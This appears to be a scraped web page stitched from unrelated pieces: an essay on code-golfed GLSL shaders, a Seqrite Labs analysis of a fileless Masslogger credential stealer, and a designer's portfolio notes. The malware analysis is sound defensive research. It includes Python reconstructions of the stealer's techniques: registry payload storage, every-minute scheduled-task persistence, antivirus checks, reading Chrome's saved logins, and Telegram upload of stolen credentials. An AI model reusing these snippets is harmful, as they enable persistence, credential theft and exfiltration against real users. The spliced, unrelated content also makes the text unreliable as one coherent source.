Seqrite’s Data Privacy Suite is purpose-built to help enterprises manage data principal rights confidently. From automated request intake and identity verification to real-time data discovery and audit-ready logs, Seqrite empowers you to comply faster, smarter, and at scale.
Success! Singapore Telecommunications (Singtel) is now a Browserling customer!
It’s another small step for a ling but one giant leap for ling kind.
Hi, I’m Xor. As a graphics programmer, my job is essentially to make pixels prettier using math formulas. I work on video effects like lighting, reflections, post-processing, and more for games and animated backgrounds in software. For fun, I like to unwind by writing compact little shader programs that fit in a “tweet” (280 characters or less). You may have seen some of these posted on X/Twitter. The process of shrinking code while maintaining its functionality is called “code golfing.”
Here’s an animated galaxy I wrote in just 197 characters of GLSL code:
This little piece of code runs in real time for every pixel on the screen and generates a unique output color using some fancy math and logic. I build these demos using a tool called Twigl.app, an online shader editor designed for sharing mini-shaders. It makes exporting videos super easy, and in its “geekiest” mode, it also takes care of the generic header code and shortens built-in variable names.
I even managed to fit a voxel DDA raytracer with edge detection into just 190 characters:
Today, I’d like to explain why I make these, share my creation process, and show you how you can try it yourself if you’re interested. Let’s start with the “why.”
Motivation
Why do I write these? Well, there are several factors. Since I like lists, I’ll go ahead and present them in order of relevance:
Curiosity and Passion: Sometimes I get struck by a new idea and just want to play around with it. I like Twigl because it helps lower my expectations and lets me start doodling. There’s less room for overplanning, and it’s super easy to jump in.
Learning and Discovery: Working within constraints forces me to think through problems differently. By optimizing for code size, I often find ways to simplify or approximate. It doesn’t always lead to more performant code (but often it does), and I’ve learned how to squeeze the most out of every byte. Having very little code makes it easier to experiment with formulas and variations without getting overwhelmed.
Challenge: Writing tiny code is both challenging and stimulating. It keeps my brain sharp, and I’m constantly developing new skills. It’s basically become a game for me. I’ve accidentally learned a ton of math while trying to solve these technical problems.
Community: I’ve connected with so many interesting people through this process—artists, designers, math folks, game devs, engineers, tech enthusiasts, and more. Sharing my work has led to some exciting encounters. (More on some notable people later!)
So, in short, it’s fun, thought-provoking, and engaging, and it’s a great way to spark interest in graphics programming. Now, what even is a shader?
Shader Introduction
In case you haven’t heard of shaders before, they are programs that run on the GPU (Graphics Processing Unit) instead of the CPU (Central Processing Unit). CPUs excel at complicated or branching operations, which are computed sequentially, one at a time (I’m simplifying here). GPUs are designed to process billions or trillions of predictable operations per second in parallel. This sounds like a lot, but a 4K screen at 60 frames per second outputs nearly 500M pixels per second. Each pixel could have 100s or 1,000s of operations, not to mention anything else the GPU might be used for.
There are several different types of shaders: vertex shaders, fragment shaders, compute shaders, and more, but these tweet shaders are specifically fragment shaders, also known as “pixel shaders,” because they run on every pixel. In essence, fragment shaders take the input fragment coordinates and output a color and opacity (or alpha). Fragment coordinates give you the position of the center of each pixel on screen, so (0.5, 0.5) is the bottom-left (or top-left). One pixel to the right is (1.5, 0.5), and so on to (width – 0.5, height – 0.5). The coordinates variable is called “FC” in Twigl. The output color, “o”, has 4 RGBA components: red, green, blue, and alpha, each ranging from 0.0 to 1.0.
(1.0, 1.0, 1.0, 1.0) is pure white, (0.0, 0.0, 0.0, 1.0) is opaque black, and (1.0, 0.0, 0.0, 1.0) is pure red in the RGBA color format. From here, you can already make simple color gradients:
o = vec4(0.0, FC.y/100.0, 0.0, 1.0);
Remember, this is run on every pixel, so each pixel will have a unique fragment coordinate. That formula makes a simple gradient that starts black at the bottom of the screen (FC.y = 0.0), and the green output value reaches 1.0 when FC.y reaches 100.0.
So you have an output color “o”, the input fragment coordinates “FC”, and four “uniform” inputs which are shared among all pixels: “r” is the shader screen resolution in pixels, “t” is the time in seconds, and there are also the less commonly used mouse position “m” and the backbuffer texture “b”. And that’s the core of it! From there, it’s a lot of math and logic to control the output colors and generate cool images.
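To make those variables concrete, here is a tiny illustrative snippet of my own (not one of the tweet shaders), written as just the shader body the way Twigl’s golfed modes expect:
// Normalize pixel coordinates with the resolution "r",
// then pulse the green channel over time "t".
vec2 uv = FC.xy / r;
o = vec4(uv.x, 0.5 + 0.5 * sin(t + uv.y * 6.2832), uv.y, 1.0);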
I’m going to skip ahead a bit, but if you’re interested in learning more, try starting here!
My Process
People often ask me whether I write my shaders in a compact form from the start or if I write them expanded and then reduce the code afterward. The answer is the former. I’ve practiced code golfing so much that I find it easier to prototype ideas in compact form, and I tend not to get lost in tiny shaders. Code golfing shaders requires finding the right balance between code size, render performance, artistic appeal, design, and mathematical function. It’s a delicate balance that definitely challenges both sides of my brain. I’ve learned a ton about math, art, and design through writing these!
To start one, you need an idea. When writing the “Milky” stars shader, I knew I wanted to create some kind of galaxy, so that was my initial spark.
My shaders typically start with centering and scaling so that they look good at various resolutions and aspect ratios. For the stars, I looped through 100 point lights revolving around the center. I love glowing effects, and they are pretty easy to create. You just need to know the distance from the current pixel to the light source and use the inverse for the pixel brightness (close pixels are brighter, far pixels are darker).
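That inverse-distance glow is only a line or two of GLSL. A simplified sketch of the idea (p, lightPos, lightColor, and col are illustrative names, not the actual shader’s variables):
// Brightness falls off with distance to the light; the small constant avoids division by zero
float glow = 0.02 / (length(p - lightPos) + 0.001);
col += glow * lightColor;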
I played around with the positions of the particles using some trigonometry and gave the disk a slight skew. For the coloring, I love to use some sine waves with a phase shift for the RGB channels. Sine waves are also useful for picking pseudo-random numbers, so that’s how I select the colors for each star. Using the sine formula, you can get palettes like these:
I ended up with a slight alteration of the one second from the left. It has a nice range of temperatures and brightness. I also added some variation to the star brightness, which made the image much more interesting to look at.
Next, I applied some tonemapping with the hyperbolic tangent function for size. Tonemapping prevents the harsh overexposure and hue shifts that happen when a color channel hits its maximum brightness value (left is original, right is with tonemapping):
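The tonemapping step itself is tiny; in GLSL it can be as simple as this (col being the accumulated HDR color):
// Hyperbolic-tangent tonemapping: compresses bright values smoothly toward 1.0
col = tanh(col);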
Any good shader that has High Dynamic Range lighting should apply some tonemapping, and tweet shaders are no exception! Finally, I played with animation. It could have revolved or twisted, but in the end, I liked the contraction effect most. I also created a loop so that new stars faded in when the old stars reached the center. You can read about my design process in more detail here!
Code Golfing
As you can imagine, there are hundreds of little techniques that I have developed (and continue to discover) in the process of shrinking the code down, but I can give you the abridged version! My generalized code-golfing process can be listed like so:
Reduce names: It may be challenging initially, but you can get used to single-letter variables and function names. You may sometimes forget what variables are for, but this is actually helpful for code golfing. It forces you to reread your code, and you’ll often find better ways to write it when doing so. Like anything else, your memory will improve with practice, and over time you will establish some standards (for me: p = position, c = color, O = frag output, I = input, etc.).
Reduce numbers: This is pretty self-explanatory. 1.0 == 1., 1000.0 == 1e3. Don’t forget that with vector constructors, you can use any data type as an input, and it gets converted (“cast”) to the new type: vec4(1.0, 1.0, 1.0, 1.0) == vec4(1). If you’re multiplying by 10.0, you could instead divide by .1.
Minimize initializations: If you have two floats, “x” and “y”, try to initialize them together like so: float x = 0., y = 1.; Look for opportunities to share data types. If you have a color vec3 and a vec4, make them both vec4s. Avoid float/int conversions.
Avoid ifs: If statements in GLSL take up a bit of space, especially if you need an else if. Try using a ternary instead. For example: if (x>y) O = vec4(1,0,0,1); else O = vec4(0,1,0,1); becomes O = x>y ? vec4(1,0,0,1) : vec4(0,1,0,1);. Much shorter, and there’s a lot you can do with it. You can even set multiple variables between ? and :.
for(;;) > while(): for and while use the same number of characters, but for has a spot for initializing (before the first semicolon) and a spot for the final step after each iteration (after the last semicolon). These are free slots that can be used for lines that would otherwise have to end with a semicolon. Also, avoid using break, and use the condition spot instead! You can also remove the brackets if each line ends with a comma (so it doesn’t work with nested for-loops).
Beyond that, I use some function substitutions to reduce the code further. More on that over here!
I’ve put together a ShaderToy demo with some additional variables, formatting, and comments for clarity. Every shader is different and requires using different techniques, approximations, and concepts, but that is precisely what makes it so fun for me! I’m still learning new stuff nearly every day!
Questions and Answers
Here are some questions I was asked on X.
Do you have a favorite “trick” or “technique”? If so, what is it?
How did you develop the intuition for related maths?
It takes lots of time and patience. I had to push through many times when I thought a topic was over my head. If you take it in small pieces, take breaks, and sleep on it, you can learn a lot! I wrote about some of the conceptualization techniques that I’ve picked up over the years. That might save you some time!
Do you start writing the shader in code-golfing mode, or is it a process until you reach the most optimized code? Which is the best editor for normal shaders and for code-golfing shaders?
Yes, I write in code-golfing mode because I’ve developed an intuition for it, and it feels faster to prototype at this point. I still have to refine the code when I find a look that I like, though. I’m a big fan of Twigl.app, but ShaderToy is great too. ShaderToy is best for its community and wealth of knowledge. I try to use it when explaining my tweet shaders.
How did you start writing cool shaders, and what did you use to learn it?
Well, I’ll explain more about my background later, but it started with an interest in game development. Shaders have tons of applications in video game graphics—that’s what sparked my curiosity to learn.
Do you have regrets related to sacrificing readability?
Nope. I’m more concerned with size optimizations that lead to slower code, but I don’t mind the unreadable code. To me, that’s part of the magic of it.
What’s your background that got you to the point where you could effectively learn the material?
It’s story time…
My Story
Growing up, I was interested in video games, especially those with “fancy” 3D graphics. When I was around 10, my friend showed me a tool called GameMaker. I tinkered around with it and learned some of the basics of drag ‘n’ drop programming, variables, and conditionals.
Over time, I started experimenting with 3D graphics in GM, even though it was (and still is) primarily a 2D game engine. It was enough to learn the basics of how 3D rendering works and the render pipeline. Later, GameMaker introduced this thing called “shaders,” which allowed developers to create more advanced effects. At the time, there weren’t many resources available, so it took a while for me to pick it up. I started posting my shaders on the GameMaker forums and got some helpful feedback from the community (shoutout to “xygthop3” for his helpful examples)!
Game development was a great place to learn about shaders because you have performance constraints (you don’t want a game to stutter), and you learn a lot about the entire rendering process in that context. In 2014, I started posting my earliest shader tutorials, sharing techniques as I learned them. The early tutorials weren’t great, but I’m glad I wrote them. In 2015, I started exploring ShaderToy, and that’s where my skills really developed.
There were so many great examples to learn from, and it was a good place to get feedback on my ideas. In 2021, I launched a new introductory tutorial series for GameMaker with GLSL 1.00. Now I post more generalized tutorials on all kinds of graphics topics, ranging from math to art to design to code and more. This is definitely my best series yet, and they continue to get better. If you are interested in video games and graphics, I highly recommend starting with GameMaker or Godot. They are relatively easy to learn while still powerful enough to teach you the ropes. If software or web dev is more your thing, you can’t go wrong with ShaderToy or compute.toys.
Here are some of the great people who have helped me, directly or indirectly, along the way:
xygthop3 – This guy’s free shader examples were probably the greatest help along the way. His examples were a pivotal point in my understanding of a variety of graphics techniques, so thanks, Michael!
Inigo Quilez – Inigo is the author of ShaderToy and the king of raymarching. His Signed Distance Field functions are still foundational to this day. An absolute legend!
Fabrice Neyret – Fabrice is probably the best shader code golfer there is, and many shaders are inspired by his work. He has taught me so many techniques over the years.
Yonatan “zozuar” – Another major inspiration for me. Yonatan’s work convinced me to try code golfing for real on Twitter, and his brain is amazing.
I’m sure there are many others whose names are eluding me at the moment, but I want to thank the entire shader community for their feedback and encouragement.
Arsenal
I’ll wrap this up with a few of my favorite tweet shaders so far:
During our recent investigation at Seqrite Labs, we identified a sophisticated variant of the Masslogger credential stealer spreading through .VBE (VBScript Encoded) files. Initially, the variant appeared to be a typical script-based threat, but deeper analysis revealed a multi-stage, fileless malware that relies heavily on the Windows Registry to store and execute its malicious payload.
In this blog post, we analyze the internal flow of the VBScript code, the obfuscation mechanisms used, and how the malware manipulates the system to remain fileless. We also explain the stagers and the capabilities of the final Masslogger payload.
Initial Infection Vector:
The infection begins with a .VBE file, likely distributed via spam email or drive-by downloads. A .VBE file is a VBScript encoded with Microsoft’s built-in encoding scheme to deter casual inspection. Once decoded, the script reveals multiple layers of obfuscation, modular routines, and its true functionality.
Analysis of Decoded .VBS – [VBScript] File:
Initially, the .VBS file prepares and writes multiple registry values under a specific key used by the malware. This sets up the execution environment for storing a fileless payload.
The registry key and value names are hard-coded and straightforward. However, a few of the critical value data entries are kept encoded and are decoded during execution.
-Registry Setup for Commands and Stager Configuration:
The subroutine AKAAU() is used to prepare keys and values before they are written to the registry. Value names and value data are stored in separate arrays – “QORXG” and “ZBZLV” respectively. Both arrays are written to the registry using “RegWrite”.
Fig-1 : .VBS file prepares and writes multiple Windows Registries
Once the system is infected, we can find these malicious registry entries in Registry Editor:
Fig-2: Malicious Registry entries, values and their probable Meaning
Here is a summary of the registry entries written to the system under the registry path “HKCU\Software\”:
Value Name | Value Data | Summary
cn | Stop-Process -Name conhost -Force | Forcefully kills the conhost.exe process.
i | “AddInProcess32.exe” | Target process for code injection.
in | “0” | Control flag indicating whether the PowerShell command has already run.
instant | LPICU | Obfuscated PowerShell commands; deobfuscated to load Stager-1 in memory.
Path | esBbIgyFlZcXjUl | Name of the registry key path; appended to “HKCU\Software\”.
r | WAJLA | .NET assembly stored in reversed-string format (Stager-2).
v | – | Obfuscated PowerShell commands; deobfuscated to load Stager-1 in memory, specifically used for user-input simulation.
Table-1: Summary of added registry entries
Before writing these registry entries, the malware calls a subroutine “ZGYHW()” that checks whether the file “C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe” is present at that location.
Depending on its presence, the malware deploys different versions of the stagers – specifically, Stager-2 in this scenario:
Fig-3: Check for MSBuild.exe file presence
– Registry Setup for Final Payload Deployment:
After the above registry entries are configured and written, there is a call to another subroutine, “XSSAY()”. This function is responsible for reading another, larger string (the actual Masslogger payload, kept encoded). The data is split into 25,000-character chunks, which are then written to additional registry values in segmented form.
Fig-4: Malware splitting another large string data to chunks and writing it to registries
Each chunk is written to the registry at these paths:
Fig-5: New registry values added as chunks of string data
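As an illustration of this segmentation step, the following sketch (an approximation, not the original VBScript) splits an encoded payload string into 25,000-character chunks and writes each chunk to its own registry value; the numbered value-name scheme is an assumption.

```python
# Approximation of the XSSAY() segmentation logic: split an encoded payload
# string into 25,000-character chunks and store each chunk as its own value.
# The numbered value-name scheme ("0", "1", "2", ...) is an assumption.
import winreg

CHUNK_SIZE = 25_000
KEY_PATH = r"Software\esBbIgyFlZcXjUl"

def write_chunks(encoded_payload: str) -> None:
    chunks = [encoded_payload[i:i + CHUNK_SIZE]
              for i in range(0, len(encoded_payload), CHUNK_SIZE)]
    with winreg.CreateKey(winreg.HKEY_CURRENT_USER, KEY_PATH) as key:
        for index, chunk in enumerate(chunks):
            winreg.SetValueEx(key, str(index), 0, winreg.REG_SZ, chunk)
```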
-Task Scheduler:
The malware establishes persistence via a Windows scheduled task, ensuring that it keeps running on the system. The task's trigger starts on the date of infection (20xx-xx-xxT00:00:00) and repeats every minute (PT1M). The task is also configured to run regardless of battery-related restrictions.
Fig-6: Task Scheduling
The task uses the same name as the created registry key, i.e., esBbIgyFlZcXjUl, and is triggered to run a .VBS file. This .VBS acts as a persistent execution loop that checks the created registry values to determine whether the payload should be executed.
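For reference, a task with an every-minute repetition like this could be expressed with a single schtasks command; the sketch below builds such a command from Python. The .vbs path is a hypothetical placeholder, and the sample itself registers the task through its own definition rather than this exact command.

```python
# Rough equivalent of the observed persistence task, expressed as a schtasks
# command (the sample registers the task differently). The .vbs path is a
# hypothetical placeholder.
import subprocess

task_name = "esBbIgyFlZcXjUl"
script = r"C:\Users\Public\esBbIgyFlZcXjUl.vbs"   # placeholder path

subprocess.run([
    "schtasks", "/Create",
    "/TN", task_name,
    "/TR", f'wscript.exe "{script}"',
    "/SC", "MINUTE",
    "/MO", "1",       # repeat every 1 minute
    "/F",             # overwrite if the task already exists
], check=True)
```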
-Task Scheduler Script – Capable of Simulating User Input:
As we can see in the image below:
The loop runs around 10,000 times, sleeping for 10 seconds between each cycle.
It reads the registry value "i" to get the name of the target process and checks whether that process is running.
It then checks whether the registry value "in" is set to 1; if so, it silently executes the malicious command stored in the "instant" value.
When "in" is not set to 1, it launches PowerShell in a visible window and uses the ".SendKeys" method to type the contents of the "v" and "cn" values, followed by "{ENTER}".
This technique effectively simulates user input to PowerShell; a simplified sketch of the loop follows the figure below.
Fig-7: esBbIgyFlZcXjUl.VBS file with user input simulation
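The sketch below is a simplified reconstruction in Python rather than the original VBScript; the registry and process names come from the sample, while the SendKeys automation is only indicated in comments.

```python
# Simplified reconstruction of the persistence loop in esBbIgyFlZcXjUl.VBS.
# It reads control values from the registry and either runs the hidden command
# stored in "instant" or opens a visible PowerShell window for key simulation.
import subprocess
import time
import winreg

KEY_PATH = r"Software\esBbIgyFlZcXjUl"

def read_value(name: str) -> str:
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, KEY_PATH) as key:
        value, _type = winreg.QueryValueEx(key, name)
        return value

for _ in range(10_000):                          # roughly 10,000 iterations
    target_process = read_value("i")             # e.g. "AddInProcess32.exe"
    # (the real script also checks whether this process is currently running)
    if read_value("in") == "1":
        # Silently run the obfuscated command stored in "instant".
        subprocess.run(["powershell", "-WindowStyle", "Hidden",
                        "-Command", read_value("instant")])
    else:
        # The real script opens a visible PowerShell window and uses WScript's
        # SendKeys to "type" the contents of "v" and "cn" followed by {ENTER};
        # that SendKeys automation is only indicated by this comment.
        subprocess.Popen(["powershell", "-NoExit"])
    time.sleep(10)                               # 10-second delay between cycles
```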
As we saw in the summary table:
The "cn" value is used to forcefully stop running instances of the conhost.exe process.
The "instant" and "v" values hold PowerShell commands used to de-obfuscate, prepare, and load the stager .NET assembly in memory, without touching the disk.
Check for System Protection Status:
The malware checks the protection status of the target system so that it can, if possible, remain undetected during execution. It does so by querying registry keys where AV / security products usually register their presence.
These registry keys are defined in the script in encoded form. The malware enumerates the subkeys of these keys and attempts to read the "DisplayName" value, which holds the name of the installed AV / security tool. If multiple security products are found on the target system, the malware halts its execution.
Fig-8: Check the presence of installed security tools
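A hedged sketch of such a check: the snippet below enumerates one well-known registry location where installed products expose a DisplayName value (the Uninstall key, used here purely as an example, since the sample's actual key list is kept encoded) and counts entries that look like security products.

```python
# Illustrative only: enumerate subkeys of a registry location where installed
# software registers a DisplayName, and count entries that look like security
# products. The exact keys used by the sample are stored encoded in the script;
# the Uninstall key below is just a common example of such a location.
import winreg

UNINSTALL = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
KEYWORDS = ("antivirus", "security", "defender")   # illustrative keywords

found = []
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UNINSTALL) as root:
    subkey_count = winreg.QueryInfoKey(root)[0]    # number of subkeys
    for i in range(subkey_count):
        sub_name = winreg.EnumKey(root, i)
        try:
            with winreg.OpenKey(root, sub_name) as sub:
                display_name, _ = winreg.QueryValueEx(sub, "DisplayName")
        except OSError:
            continue                               # no DisplayName value
        if any(k in display_name.lower() for k in KEYWORDS):
            found.append(display_name)

print(f"{len(found)} security-related products found: {found}")
```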
-Trigger for Stager:
The subroutine SQSKP() in the .VBE file is a critical part of the malware's execution chain. It dynamically constructs and runs a PowerShell command that performs in-memory execution of a .NET stager retrieved from the Windows Registry.
Fig-9: Trigger for stager
Here, the decoded text is the de-obfuscated PowerShell command, obtained after replacing |path| with RVOYN.
Fig-10: Deobfuscated PowerShell command
As we can see in Fig-10:
This PowerShell command is formed and assigned to the variable "LPICU".
The contents of the variable are then written to the registry value "instant", which is created inside the registry key "Computer\HKEY_CURRENT_USER\SOFTWARE\esBbIgyFlZcXjUl".
The function runs the constructed PowerShell command silently; the "0" argument hides the PowerShell window.
The PowerShell command then reads the registry value "HKCU\Software\esBbIgyFlZcXjUl\s", which contains Stager-1 in reversed, Base64-encoded form.
Fig-11: Forming stager-1 by reversing and Base64 decoding
We have seen malware authors use this encoding combination in many recent credential stealers, including VIPKeylogger, Remcos, AsyncRAT, etc.
The PowerShell command reverses the string, joins the pieces, decodes the Base64 data, and loads the result in memory as a .NET assembly using the "[AppDomain]::CurrentDomain.Load()" function. It then invokes the entry method "[v.v]::v('esBbIgyFlZcXjUl')", whose argument refers to the registry path. This approach allows the malware to:
Avoid writing actual malware files to disk (an evasive capability).
Dynamically construct and load the payload at runtime.
A minimal sketch of the reverse-and-decode step follows the list below.
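The sketch below is an approximation in Python; the sample's PowerShell performs the equivalent reversal and Base64 decoding before calling [AppDomain]::CurrentDomain.Load().

```python
# Minimal sketch of the stager decoding step: read the reversed, Base64-encoded
# string from the "s" registry value, reverse it, and decode it to raw bytes.
# (The sample then loads these bytes as a .NET assembly in memory.)
import base64
import winreg

KEY_PATH = r"Software\esBbIgyFlZcXjUl"

with winreg.OpenKey(winreg.HKEY_CURRENT_USER, KEY_PATH) as key:
    reversed_b64, _ = winreg.QueryValueEx(key, "s")

assembly_bytes = base64.b64decode(reversed_b64[::-1])   # un-reverse, then decode
print(f"Recovered {len(assembly_bytes)} bytes of Stager-1")
```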
We took a dump of the deobfuscated Stager-1 payload for further analysis. Our observations are as follows:
Analysis of Stager-1:
Stager-1 is a small executable kept encoded at the registry value "HKCU\Software\esBbIgyFlZcXjUl\s". It is compiled in .NET, and its size is around ~14 KB.
Analyzing its code, we found that it reads the contents of another registry value named "r" [HKCU\Software\esBbIgyFlZcXjUl\r].
Those contents are reversed to form another .NET-compiled binary: Stager-2.
This binary is then loaded in memory using "Assembly.Load()". Stager-1 locates the method r() inside the class r of the Stager-2 assembly, which serves as the entry point for Stager-2's execution.
Fig-12: Stager-1 trying to load Stager-2 and locate Method “r” in it
Analysis of Stager-2:
After Stager-1 completes its setup, the malware proceeds to its Stager-2 loader. This stage of the infection focuses on extracting the actual Masslogger payload from the registry and injecting it into a target process.
Stager-2 initially constructs potential file paths for launching the process and performing code injection.
It checks whether a file (whose name is retrieved from the registry value "i") exists in any of these paths.
In our case, we found the target file/process path to be:
Fig-13: Constructing file/process path for code injection.
Next, the malware extracts the actual Masslogger payload, which was previously written (by the subroutine "XSSAY()") across multiple registry values under the key we saw earlier.
The BBX() function of class 'r' collects all the value entries, concatenates them, reverses the combined string, and then decodes it from hexadecimal into raw bytes. This technique allows malware authors to hide a full PE binary across multiple registry values. The decoded payload is then used for process hollowing, which is performed by the function .XGP().
It’s a clever way to keep everything stored in the registry and only use memory for execution.
Fig-14: Function performing payload deobfuscation and process hollowing
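To illustrate what BBX() does, the sketch below reassembles the segmented registry values in order, reverses the combined string, and hex-decodes it into raw PE bytes; the numbered value-name ordering is an assumption, matching the earlier segmentation sketch.

```python
# Approximation of the BBX() reassembly logic: read the segmented values in
# order, concatenate them, reverse the combined string, and hex-decode it into
# the raw PE payload bytes. The numbered value names are an assumption.
import winreg

KEY_PATH = r"Software\esBbIgyFlZcXjUl"

def read_payload() -> bytes:
    parts = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, KEY_PATH) as key:
        index = 0
        while True:
            try:
                value, _ = winreg.QueryValueEx(key, str(index))
            except OSError:
                break                     # no more chunks
            parts.append(value)
            index += 1
    combined = "".join(parts)[::-1]       # concatenate, then reverse
    return bytes.fromhex(combined)        # hex string -> raw PE bytes

payload = read_payload()
print(f"Reassembled payload: {len(payload)} bytes")
```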
-France-Specific Payload Delivery:
Geo-targeted payload delivery is now common in advanced malware, allowing it to alter its behavior based on the victim's location. Stager-2 of this infection checks whether the current system's input language is set to French ("Fr") and whether the locale contains "France".
Fig-15: France specific payload delivery
If the conditions are met, it tries to download a specially crafted additional payload from the hardcoded URL hxxps://144.91.92.251/MoDi.txt. At the time of analysis, the URL was not accessible.
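An approximate Python equivalent of this input-language check is shown below; the sample performs the check in .NET, so this is an illustration of the logic only. The Windows API call and the French (France) LANGID 0x040C are standard.

```python
# Approximate equivalent of the geo check: inspect the current keyboard input
# language via the Windows API and compare it with French (France), LANGID 0x040C.
import ctypes

hkl = ctypes.windll.user32.GetKeyboardLayout(0)   # layout of the current thread
lang_id = hkl & 0xFFFF                            # low word holds the LANGID
if lang_id == 0x040C:                             # 0x040C = French (France)
    print("French input language detected")
```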
-Terminating Traces and Exiting:
At the end of its execution, the malware forcibly terminates running instances of conhost.exe and PowerShell.exe processes.
Fig-16: Process killing to hide traces
By killing these processes, the malware likely aims to hide traces of its activity. Finally, it exits the application using ProjectData.EndApp(), completing the Stager-2 lifecycle.
Analysis of Masslogger Final Payload:
After successful deobfuscation of the final payload from the registry, Masslogger is injected into the target process, "AddInProcess32.exe". We can see the marker of this malware in the memory dump of the injected process below:
Fig-17: Marker of Masslogger in memory
We took a memory dump of this payload, which represents the final stage in the malware chain. It is responsible for executing the main credential- and info-stealing functionality.
-Data Harvesting:
Like many infostealers, this malware targets multiple web browsers and a few email clients to steal sensitive information, such as saved usernames, passwords, autofill data, etc. Below is the list of web browsers and email clients Masslogger tries to target.
Fig-18: Targeted browsers and email clients for credential harvesting
Let's look at one of the modules in detail, where the malware tries to harvest saved login credentials from the Chrome browser.
Fig-19: Chrome browser specific module for credential harvesting
It locates the user's login data by accessing Chrome's "Login Data" SQLite database. It extracts website URLs along with the corresponding usernames and passwords and collects them for further use. If valid credentials are found, they are stored in a structured format containing the website, username, and password.
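For context, "Login Data" is an ordinary SQLite file, and the sketch below shows how its logins table is typically queried; the origin_url, username_value, and password_value columns are Chrome's standard schema, and the stored password blob is additionally encrypted, so decryption is omitted here.

```python
# Illustrative query against a copy of Chrome's "Login Data" SQLite database.
# Column names are Chrome's standard schema; password_value is an encrypted
# blob (DPAPI/AES-GCM), and decryption is intentionally omitted here.
import sqlite3
from pathlib import Path

login_data = Path.home() / r"AppData\Local\Google\Chrome\User Data\Default\Login Data"

conn = sqlite3.connect(login_data)       # in practice, stealers copy the file first
for origin_url, username, encrypted_pw in conn.execute(
        "SELECT origin_url, username_value, password_value FROM logins"):
    print(origin_url, username, f"<{len(encrypted_pw)} encrypted bytes>")
conn.close()
```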
Apart from targeting browsers and email clients for info stealing, Masslogger also has the capabilities to:
Log keystrokes.
Take and clear snapshot files.
Retrieve clipboard data.
Monitor user activity by calling GetForegroundWindow, GetWindowText, etc.
Read system details, such as IP address and country.
Upload multiple files to a server.
-Data Exfiltration:
The SpeedOffPWExport() method in the final payload enables data exfiltration by sending the collected credentials and system information to remote locations via multiple channels, such as FTP, SMTP, or Telegram.
If FTP is enabled, the method uploads the stolen data as a .txt file to a remote FTP server using hard-coded credentials.
Fig-20: Data exfiltration via FTP
For SMTP, it constructs an email containing the data in either the message body or as an attached text file and sends it using the specified mail server.
Fig-21: Data exfiltration via SMTP
If Telegram exfiltration is enabled, it sends the data as a document using the Telegram Bot API, including a caption with the victim’s username and IP.
Fig-22: Data exfiltration via Telegram
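The Telegram channel relies on the standard Bot API; the sketch below shows the general shape of such a sendDocument upload. The token, chat ID, and file name are placeholders, and this illustrates the API call rather than the sample's code.

```python
# Shape of a Telegram Bot API "sendDocument" upload, as used for exfiltration.
# Token, chat_id, and file name are placeholders for illustration only.
import requests

BOT_TOKEN = "<bot-token>"
CHAT_ID = "<chat-id>"

with open("stolen_credentials.txt", "rb") as fh:
    requests.post(
        f"https://api.telegram.org/bot{BOT_TOKEN}/sendDocument",
        data={"chat_id": CHAT_ID, "caption": "USERNAME / IP"},   # victim info caption
        files={"document": fh},
        timeout=30,
    )
```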
Conclusion:
The fileless Masslogger variant illustrates the evolving trend of info-stealing malware. Delivered via a .VBE script, it abuses the Windows Registry to store its actual executable payload and loads that payload directly into memory without touching the disk. It can harvest stored credentials from multiple browsers and email clients and uses multiple channels [FTP, SMTP, Telegram Bot] for data exfiltration.
This variant shows the shift of credential-stealer malware towards fileless, multi-stage operation (Stager-1, Stager-2), which challenges traditional AV and signature-based detection methods. To counter this, defenders must employ advanced detection mechanisms such as behavioral detection and monitoring for registry anomalies.
I’m Bimo Tri, a multidisciplinary designer and creative developer based in Indonesia. I run a small independent studio called Studio•Bämo.J®, working between Jakarta and Bali — or pretty much anywhere I can find a fast internet connection.
My focus is on building expressive digital experiences, mostly portfolio sites and brand platforms for creatives, studios, and design-forward brands. With roots in both design and development, I enjoy blending visual precision with motion and interactivity to create work that feels both thoughtful and visceral. I care deeply about craft, story, and making things that resonate beyond just visuals.
Saisei is a visionary architecture firm based in Tokyo, Japan, focused on sustainability, culture, and timeless design. I designed and developed the site to reflect their philosophy merging traditional Japanese aesthetics with clean, contemporary digital design.
Achievements
This project was a major milestone in my career. It brought home my first Awwwards Site of the Day and earned recognition from several other platforms. The positive feedback from the design community affirmed my approach to cultural storytelling through digital mediums.
Personal notes
Saisei remains one of my favorite works. I’ve always been drawn to the tension between heritage and modernity, and this project gave me the space to explore that deeply. The recognition it received made the process even more meaningful.
Nagara is a concept project developed in collaboration with my buddy Felixander Yuan, created as part of the #DareToShare24 design challenge by @bentenwordring.
It reimagines a luxury watch brand that fuses the precision of Swiss watchmaking with the cultural depth of the Majapahit Empire. Each timepiece acts as a tribute not just to technical craftsmanship, but to historical richness and aesthetic symbolism rooted in Indonesian heritage.
Challenges
One of the biggest hurdles was exploring AI-generated imagery and motion assets. Using tools like Midjourney and Kling, it took numerous iterations to dial in a visual direction that felt both on-brand and high-end. Getting the product visuals — especially the watches — to look authentic and aligned with the brand’s narrative was far more challenging than anticipated.
Achievements
The final result was a fully animated concept site that we were genuinely proud of. Yuan did an amazing job bringing the dev and motion to life. Beyond that, the project ended up winning the monthly challenge, earning recognition and some cool prizes — a nice bonus on top of the creative satisfaction.
Personal notes
This one felt personal. The month’s theme was “Luxury” — a space I naturally gravitate toward — and we were allowed to team up for the final challenge. I chose to work with Yuan, someone I’ve respected and known for a while. The entire process felt like a return to roots — storytelling, culture, and collaboration — wrapped inside a luxury narrative.
Horizon Studio is a conceptual architecture firm based in Los Angeles, created to explore the intersection of art, design, and technology. Inspired by my love for architecture and interior design, the site showcases sleek, avant-garde visuals with a focus on sustainability. I used Midjourney for the visual assets and GPT to shape the narrative, crafting an experience that feels modern and immersive.
Achievements
The site received an Honorable Mention from Awwwards — a validating moment for me as it was one of my earliest forays into the architecture space. The feedback highlighted the strength of the design direction and the site’s overall atmosphere.
Personal notes
This was the first project where I went all in with generative AI — every asset was made using prompts, and honestly, it was pretty sloppy at first. But through experimentation, I managed to create a cohesive visual style that looked like it came from one photographer. It reminded me how fun it is to dive into the unknown and just explore.
REZN-8 is a typographic and layout exploration rooted in Swiss design principles. It started as a poster experiment and evolved into a full website — my first time building a motion-heavy site entirely with code. It was all about translating static design into something dynamic, expressive, and functional in a digital format.
Challenges
Turning the poster into a functional site was already a challenge, but learning JavaScript on the fly to bring motion into the experience pushed me even further.
